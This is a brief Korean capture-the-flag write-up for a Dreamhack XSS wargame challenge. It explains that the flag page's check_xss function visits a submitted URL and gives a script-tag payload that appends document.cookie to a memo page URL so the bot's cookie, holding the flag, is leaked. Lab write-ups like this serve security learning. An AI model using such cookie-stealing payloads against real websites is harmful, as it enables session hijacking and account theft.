https://dreamhack.io/wargame/challenges/28
각각 버튼을 눌러보면 이렇다.
vuln(xss) page
memo
flag
코드를 보면 이렇다.
check_xss 함수를 보면 입력한 URL을 참조하는 것을 알 수 있다.
flag 함수에서 check_xss 함수로 넘어가기에 입력란에
<script>location.href="http://127.0.0.1:8000/memo?memo=hello"+document.cookie;</script>해주면 flag가 나온다.
前) SWLUG 27기